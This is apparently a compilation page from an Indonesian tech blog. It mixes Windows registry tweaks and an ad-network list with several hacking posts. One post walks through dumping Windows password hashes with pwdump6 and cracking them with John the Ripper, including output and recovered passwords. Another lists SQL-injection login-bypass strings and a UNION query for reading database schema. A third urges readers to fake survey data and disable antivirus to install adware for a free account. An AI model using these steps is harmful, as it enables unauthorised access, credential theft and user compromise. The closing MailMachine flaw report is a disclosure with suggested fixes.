Home » All posts

Create Additional shortcut on Right click



Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path, its cool!

First we will add the copy and move options to the right click menu of all FILES.

CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

Right click the ContextMenuHandlers key and choose New>Key.
Name the new key “Copy To” (without the quotes).
Repeat the above and create another new key named Move To.

You should now have two new subkeys under the ContextMenuHandlers key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Copy To
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Move To

Select the Copy To key and in the right hand pane, double click “Default”
Enter this clsid value as the value data:

{C2FBB630-2971-11d1-A18C-00C04FD75D13}

Next , select the Move To key and in the right hand pane set the default value to:

{C2FBB631-2971-11d1-A18C-00C04FD75D13}

This now takes care of the Copy and Move options for the right click context menu of all your files.
Now all that is left is to add the same options to the right click menu of all your folders.
The procedure will be the same as for files but at a different key:

HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHan dlers

Right click ContextMenuHandlers and create a new key named Copy To.
Right click it again and create another new key named Move To.

left click on the right hand pane, add the same default values as you did for Files:

For Copy To:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
For the Move To:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}

Exit the registry and you are done.

Artikel Terkait dibawah ini :

How to Get Rapidshared Account [FREE]

How to Get Rapidshared Account for 1 month, that's right. It no Need to refferal any People or promote your url, just complete an offer and done...that's it.

First at All.. sign in on below url
http://www.freepremiumaccounts.com/?r=347091

It works. It does take some time, but you can get Rapidshare 1 Month Account for Free.

Do this:

- Select reward, enter e-mail (valid one) & password
- Complete Sign Up
- Click Offers (next to Status)
- Click on the Ad
- Register at the PremissionResearch
- Important! Complete Survay! (You have to be resident of the U.S., but if not, make up urself, only thing that you should watch out for is zip code, don't enter random, google for real zip code).
- Important! When you see the page with some softwere instalations, go to 'No Thanks'
- But after that, you have to install Add On (Its PremissionResearch Buying Aplication, harmless, but anti-virus softwere may recodnize it as threat, I disconeccted my Firewall & Anti-Virus, but maybe you don't have to)
* Important! Note: This procedure will install Ad-Ware on your computer. Its harmless and its the only way to get the rapidshare account. Just so you know, so you don't curse me after. I have it. It does nothing.
- Go to your e-mail that you entered
- Go to Spam Box and read the Kelly Jones mail
- Click on the 'Click Here to complete your registration now'
- For completing survay and gettin ur free rapidshare account you need to see 'Thank you' page. Instalation of Add On must be completed (maybe you'll need to restart ur browers of even computer
- Log in PremissionResearch
- Wait for 24 hours and you'll get ur RapidShare of MegaUpload account on your freerapidshareaccount.com account through ur e-mail


I got this offer another blog on Comment box, i've not try this before, coz i still have 1 year Rapidshared Account that i got on "WARNET [Warung Internet] gitu Lho... :)

Artikel Terkait dibawah ini :

Clearing the Page File on Shutdown

Another way to set the computer to clear the pagefile without directly editing the registry is:

1.Click on the Start button
2.Go to the Control Panel
3.Administrative Tools
4.Local Security Policy
5.Local Policies
6.Click on Security Options
7.Right hand menu - right click on "Shutdown: Clear Virtual Memory Pagefile"
8.Select "Enable"
9.Reboot


If you want to clear the page file on each shutdown:

1.Start Regedit
2.Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ClearPageFileAtShutdown
3.Set the value to 1

Artikel Terkait dibawah ini :

Installing the NetBEUI Protocol

Microsoft no longer supports the NetBEUI protocol as part of WindowsXP.
You can add it as a installable protocol by going to the VALUEADD \ MSFT \ NET \ NETBEUI
directory on the CD ROM.
Note: %SYSTEMROOT% refers to the drive and directory where you installed WindowsXP.
Typically this is in the C:\WINDOWS directory

1.Copy the nbf.sys into the %SYSTEMROOT%\SYSTEM32\DRIVERS\ directory
2.Copy netnbf.inf into the %SYSTEMROOT%\INF\ directory
3.Open the Network connection properties for your local area network and use "Install..." button to add NetBEUI protocol

I included a zipped file with the above files and a simple batch file to copy both to the appropriate directories
This is only if you absolutely need NetBEUI. It is not at all a necessary requirement for most networks

Artikel Terkait dibawah ini :

E-Book, Tutorial, Software, Mp3 Update.....

E-Book:



Tutorial:



Software:




MP3:

Abandon_-_All_Because_Of_You.mp3



Armor_For_Sleep_-_Know_What_You_Have.mp3



Ashley_Tisdale_-_I_m_Back.mp3



Bayside_-_I_Cant_Go_On.mp3



Bloc_Party_-_Talons.mp3



Christina_Aguilera_-_Keeps_Gettin_Better.mp3



Cliff_Richard_-_Thank_You_for_A_Lifetime.mp3



Daughtry_-_Feels_Like_The_First_Time.mp3



DecemberRadio_-_Find_You_Waiting.mp3



Elena_Norde_-_I_Dont_Wanna.mp3




NOTE: All Of this Files is "NOT STORE ON THIS BLOG". All files store on third party website.

Artikel Terkait dibawah ini :

Another way to H**K account Administrator

Gunakan tolls pwdump6 dan john the ripper, ekstrak file zip ke dalam folder

1. Jalankan CMD (Run->cmd)

2. Masuk ke direktori pwdump. Jalankan pwdump6 dengan perintah :

PwDump.exe -o pass.txt 127.0.0.1


pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.

3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi.
Contohnya akan tampak seperti berikut :

ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::

4. Copy file pass.txt ke dalam folder tempat “john-386.exe” berada, jalankan perintah berikut dan tunggu dengan sabar :

john-386.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)

Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123?, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.

Administrator:1+Administrator:2 = adminkeren123

Sedangkan untuk user “coba” adalah “mudahditebak”!!

source: Internet dan Blog

Artikel Terkait dibawah ini :

SQL Attacks Hacking

This i found over
the internet. When at first i randomly typed any password. then it gave an sql
error that " zero row selected" and incorrect password. So I thought of using
SQL string injection . SQL is poor in security issues surrounding is the login
and url strings. So idea is you give these values in login form :

user : ' OR 1=1–

password : ' OR 1=1–


and voila you are
in. the other possible strings for password are :



  • ' OR a=a–
  • ' or 0=0 #
  • ") or ("a"="a

  • ') or ('a'='a


So whats the funda
behind this :

When you click "login" or "enter" on webpage the variables 'userid' and 'password'
are to sql. The underlying query is :


SELECT * from auth_db
where username = ' $userid ' AND password = '$password'


So if you have
entered username = admin and password = test123 then query executed will be
:

SELECT * from auth_db where username = ' admin ' AND password = 'test123 '


So in auth_db ,
if userid and password are correct than corresponding row will be selected and
as no of rows returned is > 0 you will be granted access. But if password
is incorrect than it will retun zero rows and permission won't be granted. But
if you use SQL string injection like if you put ' OR 1=1– as password and username
both than query executed will be :


SELECT * from auth_db
where username = ' ' OR 1=1– ' AND password = '' OR 1=1– '


Because a pair
of hyphens designate the beginning of a comment in SQL, the query becomes simply
becomes :


SELECT * from auth_db
where username = '' OR 1=1


The expression
1=1 is always true for every row in the table, and a true expression or'd with
another expression will always return true. So, assuming there's at least one
row in the Users table, this SQL will always return a nonzero count of records.So
you are logged in now. And if in some cases But many times sql tries to parse
= character in input strings and didn't allow to do so, hence trick is using
:

' OR userid LIKE '%%


So resultant query
will be


SELECT * from auth_db
where username = ' ' OR userid LIKE '%% ' AND password = '' OR userid LIKE '%%
'

So every string matches '%%' so it returns non zero number of and you are granted
access.

Not all SQL injection attacks involve forms authentication. All it takes is
an application with some dynamically constructed SQL and untrusted user input.
Most SQL-compliant databases, including SQL Server, store metadata in a series
of system tables with the names sysobjects, syscolumns, sysindexes, and so on.
This means that a hacker could use the system tables to ascertain schema information
for a database to assist in the further compromise of the database. For example,
the following text entered into the txtFilter textbox might be used to reveal
the names of the user tables in the database:


' UNION SELECT id, name, '', 0 FROM sysobjects WHERE
xtype ='U' --


The UNION statement
in particular is useful to a hacker because it allows him to splice the results
of one query onto another. In this case, the hacker has spliced the names of
the user tables in the database to the original query of the Products table.
The only trick is to match the number and datatypes of the columns to the original
query. The previous query might reveal that a table named Users exists in the
database. So after this with multiple queries you can get control over database.


 


********************************************************************************

WARNING: the information provided is for educationally purposes only and not
to be used for malicious use. i hold no responsibility

********************************************************************************


source:Blog
[which no exits anymore].

Artikel Terkait dibawah ini :

Google Adsense Alternative

Iya, seperti judulnya " Google Adsense Alternative" bagi kamu-kamu yang sudah daftar/register di google tapi blom di approve sampai sekarang :) [ kayak gw, udah di approve ee.... nggak taunya kena banned :( trus daftar lagi, unfortunately buat lokasi indonesia udah nggak bisa lagi [ denger-denger kayak gitu].

Jadi sekarang gw coba ngepost-ing cara menghasilkan dollar or duit atau apalah dari internet selain dari [Ads by Google] Google Adsense. [P.S: sebagai catatan aja, yang akan kita bahas sekarang ini bukan Paid to Click [PTP] program, clicking Ads[e.g: bux.to], reading email and get paid[e.g: agloco mail], surf ads[e.g ts25, easyhits4u.com] dan review website[e.g: AWSurvey] dan lain sebagainya that i can't mentions one by one.

so let get start dari earing yang paling banyak gw kumpulinsampai saat ini, :)

1. Adster
Iya, Adster.tapi sayangnya "NO refferal" minimum payouts for free members adalah $60 trus untuk earning yang dihasilkan dibagi 2, untuk yang mempublikasikannya dan untuk adster itu sendiri, btw kita bisa menentukan sendiri persen yang akan dibagikan antara kedua belah pihak, so Enjoy.. :) :))

2. Chitika



Iklan berbasis page visit, dan unique IP addres, sementara iklannya hanya men-support image [mostly] dan untuk text ads masih minim or coming soon [itu kata dari official website chitika], trus uniknya chitika ini mempunyai iklan yang dikhususkan untuk zona/daerah Amerika dan Canada "ONLY" so bagi yang punya traffic Amerika dan Canada dapat memanfaatkan fasilitas ini, minimum payouts $50 via Paypal or check yang akan dikirim right the way on your home address.

3. Adbrite



ini pasti pada udah tau, so "NO Comment" mungkin review dikit kali yah, adbrite hanya akan menampilkan iklan mereka jika blog/website kita page viewnya, artikelnya dan unique visitor-nya "gede", so, siap-siap yang punya blog/website yang traffic-nya minim or bahkan low, kalian hanya akan lihat iklan " ads by Adbrite" tanpa ada perubahan, alias nggak ada yang tertarik buat masang iklan di blog or website lu :) :) :) :) [rasain....] lain halnya dengan Adster, Chitika dan Google <<<<< [ sayang udah nggak bisa lagi :( ] mereka akan senantiasa menampilkan iklannya tanpa peduli ada yang kunjungi atau tidak blog/website kamu.

4. Blueadvertise



Gw baru aja join ini program, ternyata ....nice :) blueadvertise memanfaatkan unique visitor ip dan lamanya user berada di blog/website, tentang payment method bisa melalui paypal, alertpay, dan check dan yang paling penting support refferal. 5. Ceoads.com Iklan tanpa harus di click, hanya memanfaatkan unique ip per 1000/visitor, earning yang dihasilkan adalah $3,6 dollar langsung di transfer ke Paypal or Alertpay, support Refferal.


6. ADDITIONAL...[you can try by your self :) ]
- pub.oxado ---> iklan international, lebih banyak images dari pada text ads. earning EURO...

- Adspeedy ---> indonesia punya, earning berdasarkan banyak click dan unique page view

- PPC indonesia --> Indonesia Ads, tapi cuman bisa letak ads pada blog yg di approve aja.INGAT

- Adsensecamp --> You know-lah.... kembaranya google adsense.


That's all.......kalo ada yang nggak jelas or mau di tanyakan.... be my guest[ane juga lagi belajar] dengan meninggalkan message di shoutbox....

Artikel Terkait dibawah ini :

Increasing File System Caching

To increase the amount of memory Windows will locked for I/O operations:

  1. Start Regedit
  2. Go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
  3. Edit the key IoPageLockLimit
4096 - 32megs of memory or less
8192 - 32+ megs of memory
16384 - 64+ megs of memory
32768 - 128+ megs of memory
65536 - 256+ megs of memory

Artikel Terkait dibawah ini :

Adding SafeBoot to the Boot Menu

You can add Safeboot as an option to the normal XP boot screen

1.Open a command prompt
2.Copy the current c:\boot.ini to another name (just in case)
3.With your favorite text editor, edit c:\boot.ini
4.Copy then edit the current boot line to another line. For example:
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect
might copy and then change to:
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional Safeboot" /fastdetect
5.Start MSCONFIG
6.Click on the BOOT.INI tab
7.Highlight the second line with the additional name of Safeboot
8.Check the /SAFEBOOT box with option you want
Minimal - Minimal set of drivers
Network - With Network Support
Dsrepair - Directory Services Repair
Minimal (Alternate Shell) - Standard Explorer Desktop
9.You will now have this option every time you start XP

Artikel Terkait dibawah ini :

MailMachine flaws

-> What is MailMachine.cgi?



MailMachine is a perl CGI script written by Mike's World (http://www.mikesworld.net). MailMachine is described as:



"Mail Machine is a great mailing list script that allows visitors to your website to subscribe and unsubscribe to your mailing list without ANY work from you. This is a great way to inform your visitors on what's happening, and bring them back!"



The reason I have written this is not to encourage people to go and mess up servers with MailMachine running - it is to make people realise it is not a secure script. Hopefully the author will then take notice of what I have said and do something about it.



-> What flaws are present?



I recently downloaded MailMachine for use on my server, and after a couple of test runs I realised that a number of flaws are present. Here are the problems I found, although there are probably a lot more:



1) Subscribing



When the 'confirm subscription' option is on, it is easy for anyone to guess the confirmation url they need to go to confirm the subscription as it follows this format:



http://www.domain.com/cgi-bin/mailmachine.cgi?



So, a hacker could subscribe anyone he wants to the list by first entering their email address and clicking subscribe, and then confirming the subscription by adding a ? on the end of the scripts location. This renders MailMachine's confirm subscription option useless.



2) Unsubscribing



The same type of security problem is present, except this time a confirmation is not even necessary. A member of the list can unsubscribe themselves at any time by going to:



http://www.domain.com/cgi-bin/mailmachine.cgi?



No confirmation will be sent, they will simply recieve a email to say they have been unsubscribed. So, a hacker can unsubscribe anyone from the list by going to that address. This effectively means that anyone can unsubscribe anyone.



3) Permissions



"Email.txt" and "Temp.txt" hold the subscribed emails and the 'to be confirmed' email addresses respectfully. By default the permissions set to the files "email.txt" and "temp.txt" means that the two files can be read by anyone. A hacker could access the file "email.txt" and unsubscribe everyone from the list using the technique mentioned above.



4) Banned addresses



The owner of the list is allowed to specify some banned addresses, however, these banned addresses are cAsE sensitive. So, if I ban the address:



trouble@hacker.com



That email can still be easily subscribed to the list by subscribing the address:



Trouble@hacker.com



(Notice the capital 'T')



This makes it very difficult and annoying for a mailing list admin to actually ban an address.



5) More Case problems



MailMachine makes checks to see if someone who tries to subscribe is already subscribed. The case sensitivity is also present on subscribing an address. Therefore, the checks that mailmachine makes to see if the address is already subscribed are pointless - even with checks, if you@you.com is subscribed - You@you.com would be allowed.



6) Major problems with www.hotmail.com



When a confirmatiom email is sent, the address the recipient must click will look something like this:



http://www.domain.com/cgi-bin/mailmachine.cgi?



Clicking this link should then send the person to the screen which will confirm their subscription...however, if the email is sent to a hotmail account, this will not happen.



Hotmail does not read the '?' as part of the actual link, and therefore cuts off everything after the ? - so the address the recipient is actually taken to would be:



http://www.domain.com/cgi-bin/mailmachine.cgi



Which will not confirm their subscription...this makes it difficult for a hotmail user to confirm his or her subscription.



--> Suggested fixes



There are a lot of problems, but they can all easily be fixed. I suggest that the author does the following:



1> Make the confirmation link have a unique code at the end, for example:



Instead of: http://www.domain.com/cgi-bin/mailmachine.cgi?



Make it: http://www.domain.com/cgi-bin/mailmachine.cgi?Qs672n



2> When checks are done to see if an address is subscribed or banned - convert the email addresses to full uppercase. Then there will be no case sensitivity issues.



3> Add a feature so that the admin can send a confirmation for each unsubscribe request.



4> Send emails in html. This gets rid of the hotmail '?' bug as it is part of a link.



5> Provide information on how to chmod or secure the email.txt and temp.txt files correctly.



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Artikel Terkait dibawah ini :
 
Copyright © 2011 Blogger with Love | Themes by Edit-me.